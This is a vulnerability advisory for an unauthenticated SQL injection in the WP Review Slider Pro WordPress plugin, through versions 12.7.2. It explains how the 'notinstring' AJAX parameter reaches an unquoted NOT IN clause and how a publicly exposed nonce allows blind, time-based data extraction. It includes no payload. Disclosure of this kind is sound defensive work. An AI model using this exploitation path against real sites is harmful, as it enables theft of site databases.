PT-2026-54949 · Https://Wpreviewslider.Com/ · Wp Review Slider Pro
H0Xilo
·
Published
2026-07-02
·
Updated
2026-07-02
·
CVE-2026-8441
CVSS v3.1
7.5
High
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
The WP Review Slider Pro plugin for WordPress is vulnerable to SQL Injection via the 'notinstring' parameter of the wprp load more revs AJAX action in versions up to, and including, 12.7.2. The parameter is read via $ POST['notinstring'] and passed through sanitize text field() — which strips HTML and whitespace but does not provide SQL safety. The value is then concatenated directly into a numeric/unquoted
AND id NOT IN (...) clause and executed via $wpdb->get results() without $wpdb->prepare() or intval() casting. Because the value sits in an unquoted numeric context, WordPress's wp magic quotes protection (which only escapes embedded quotes) is ineffective. The AJAX hook is registered via wp ajax nopriv wprp load more revs, and the required check ajax referer nonce is publicly available via wp localize script on any frontend page that renders the plugin shortcode, so an unauthenticated attacker who can reach a public page hosting the plugin can extract arbitrary data from the database via blind/time-based injection.Fix
SQL injection
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Wp Review Slider Pro